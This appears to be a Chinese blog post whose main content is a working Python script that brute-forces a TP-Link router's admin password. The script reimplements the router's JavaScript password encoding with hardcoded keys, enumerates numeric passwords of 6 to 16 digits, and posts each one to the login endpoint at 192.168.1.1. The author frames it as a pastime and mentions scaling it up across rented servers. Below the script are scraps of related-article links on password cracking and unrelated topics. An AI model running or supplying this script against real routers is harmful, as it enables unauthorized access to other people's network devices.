title: TP-Link路由器后台密码爆破

author: 杨晓东

permalink: TP-Link路由器后台密码爆破

date: 2021-10-02 11:27:04

categories:

- 嗯哼

tags:

- 无聊

TP-Link路由器后台密码爆破

import requests

import itertools

import time

# 访问测试

# url = "http://192.168.1.1/"

# r = requests.get(url)

# print("状态码:",r)

# print("网页内容:",r.text)

# 装饰器 计算时间

def time_out(a_func):

    def clocked(*args, **kwargs):

        start = time.time()

        result = a_func(*args, **kwargs)

        end = time.time()

        print("程序:" + a_func.__name__,"    运行时间:" + str(end - start))

        return result

    return clocked

# js逆向 路由器密码加密方式

def security_encode(b):

    a = 'RDpbLfCPsJZ7fiv'

    c = 'yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD02KZciXTysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV57fQMc8L6aLgMLwygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oBwmCAHoic4HYbUyVeU3sfQ1xtXcPcf1aT303wAQhv66qzW'

    e = ''

    g = len(a)

    h = len(b)

    k = len(c)

    f = g if g > h else h

    for p in range(f):

        n = l = 187

        if p >= g:

            n = ord(b[p])

        elif p >= h:

            l = ord(a[p])

        else:

            l = ord(a[p])

            n = ord(b[p])

        e += c[((l ^ n) % k)]

    return e

# 使用加密后的密码开始登陆路由器后台

def login(password):

    requests.get('http://192.168.1.1', headers={'Content-Type': 'application/json'})

    r = requests.post('http://192.168.1.1', json={"method": "do", "login": {"password": security_encode(password)}})

    code = r.status_code

    if code == 200:

        print('状态码:',code,"密码正确,登陆成功!!!!!!!")

    else:

        print('状态码:', code, "密码错误,继续尝试登陆.......")

    return code

# 密码字典  生成密码

@time_out

def num_z_Z_symbol(a=5,count=0):

    """

    我认为的所有密码:

    数字 + 小写字母 + 大写字母 + 符号...

    :return:

    """

    # chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!@#$%^&*?_-."

    chars = "0123456789"  # 上面字典生成的密码太多了 先用纯数字玩玩吧  纯属娱乐  改天认真了买几十台服务器  分布式爆破

    with open("./tplinkpasswd.txt","a",encoding='utf-8')as f:

        for i in range(6, 17):  # 密码长度  从6位数开始  16位数密码结束

            for c in itertools.product(chars, repeat=i):

                count += 1

                password = ''.join(c)

                print('*************** 第 ' + str(count) + ' 组密码 ***************')

                print(password)

                # e = security_encode(password)

                if login(password) == 200:

                    print("密码破解成功,程序退出!")

                    print(password)

                    f.write(password+r'\n')

                    f.close()

                    break

                else:

                    pass

if __name__ == '__main__':

    # 开始破解

    num_z_Z_symbol()

TP-Link路由器后台密码爆破的更多相关文章

  1. Discuz!X 系列 HTTP_X_FORWARDED_FOR 绕过限制进行密码爆破

    分析有个不对头的地方:http://wooyun.jozxing.cc/static/bugs/wooyun-2014-080211.html 后面再补 这个漏洞比较简单. 我们看到配置文件来./in ...

  2. PHPCMS后台密码忘记解决办法

    什么是PHPCMS? PHPCMS是一款网站管理软件.该软件采用模块化开发,支持多种分类方式,使用它可方便实现个性化网站的设计.开发与维护.它支持众多的程序组合,可轻松实现网站平台迁移,并可广泛满足各 ...

  3. 数据库密码爆破HexorBase

    数据库密码爆破HexorBase   数据库服务是服务器上最常见的一类服务.由于数据库保存大量的敏感信息,所以它的安全非常重要.测试数据库服务安全的重要方式,就是检查口令的强壮度.   Kali Li ...

  4. ecshop 重置后台密码 MD5+salt

    ecshop密码加密方式: MD5 32位+salt,简单来说就是明文密码用MD5加密一次,然后在得到的MD5字符后边加上salt字段值(salt值为系统随机生成,生成以后不再改变)再进行一次MD5加 ...

  5. ecshop教程:重置后台密码MD5+salt

    ecshop密码加密方式: MD5 32位+salt,简单来说就是明文密码用MD5加密一次,然后在得到的MD5字符后边加上salt字段值(salt值为系统随机生成,生成以后不再改变)再进行一次MD5加 ...

  6. DEDECMS如何修改数据库密码以及忘记了后台密码怎么办

    忘记后台密码1.登录PHPmyadmin登录phpmyadmin,找到忘记密码网站所在的数据库并打开2.打开dede_admin数据表:找到dede_admin这项如图,pwd下的值就是你的密码,织梦 ...

  7. Burp_用户名密码爆破

    burp 全称 Burp Suite, 是用于攻击web 应用程序的集成平台.它包含了许多工具,可以抓包可以爆破也可以扫描漏洞. 主要组件如下: Proxy--是一个拦截HTTP/S的代理服务器,作为 ...

  8. WebCracker4.0和monster字典——路由器登陆密码破解工具

    路由器登陆密码破解,很伤cpu的

  9. [原创]K8Cscan插件之Windows密码爆破

    [原创]K8 Cscan 大型内网渗透自定义扫描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan简介:何为自定义扫描器?其实也是插件化,但C ...

  10. [原创]K8Cscan插件之Mysql密码爆破

    [原创]K8 Cscan 大型内网渗透自定义扫描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan简介:何为自定义扫描器?其实也是插件化,但C ...

随机推荐

  1. Jmeter之随机变量元件与用户自定义变量元件区别及使用

    用随机变量(random variable)与用户自定义变量(User defined variables)的区别: 随机变量:在同个线程或者不同线程时,每个次循环执行时值都会重新生成 用户自定义变量 ...

  2. ob-myfreemp3

    网站 aHR0cDovL3Rvb2wubGl1bWluZ3llLmNuL211c2ljLw== 打开之后随便搜一个歌手的名字或歌曲(这里搜林俊杰)  m/api/search,可以看到数据全在这里 全 ...

  3. 【深入浅出 Yarn 架构与实现】4-3 RM 管理 NodeManager

    本篇继续对 RM 中管理 NodeManager 的部分进行深入的讲解.主要有三个部分:检查 NM 是否存活:管理 NM 的黑白名单:响应 NM RPC 请求. 一.简介 在 RM 的主从结构中,最主 ...

  4. 学习js的一些笔记

    1,对变量的一些认识 在学习java的过程中,我对变量的理解,其实就是一个在运行期进行简单储存的数据的内存空间,运行期结束后就会在各个代码的垃圾回收机制中在内存空间中消除. 对于变量,在java中,一 ...

  5. 基于Spark的均值漂移算法在网络舆情聚类中的应用

    知网链接 原文链接 张京坤,  王怡怡 软件导刊   2020年19卷第9期 页码:190-195 DOI:10.11907/rjdk.192529 出版日期:2020-9-15 摘 要: 为了改善网 ...

  6. 物以类聚人以群分,通过GensimLda文本聚类构建人工智能个性化推荐系统(Python3.10)

    众所周知,个性化推荐系统能够根据用户的兴趣.偏好等信息向用户推荐相关内容,使得用户更感兴趣,从而提升用户体验,提高用户粘度,之前我们曾经使用协同过滤算法构建过个性化推荐系统,但基于显式反馈的算法就会有 ...

  7. js 禁用刷新快捷键

    // 上代码 /** * 按键监听 * Ctrl-17,F5-116,R-82 */ var oldKeyCode = -1; document.onkeydown = function (e) { ...

  8. Array list练习

    Array list练习 数据添加到集合 生成6个1~33之间的随机整数,添加到集合,并遍历 public class Test01ArrayList { public static void mai ...

  9. Web 页面如何实现动画效果

    Web 页面可以使用多种方式实现动画效果,其中最常用的有两种: CSS 动画:通过 CSS 中的 transition 和 animation 属性来实现动画效果.CSS 动画实现起来简单,性能消耗小 ...

  10. 线上排查:内存异常使用导致full gc频繁

    线上排查:内存异常使用导致full gc频繁 问题系统 日常巡检发现,应用线上出现频繁full gc 现象 应用线上出现频繁full gc 排查过程 分析dump 拉dump文件:小插曲:dump时如 ...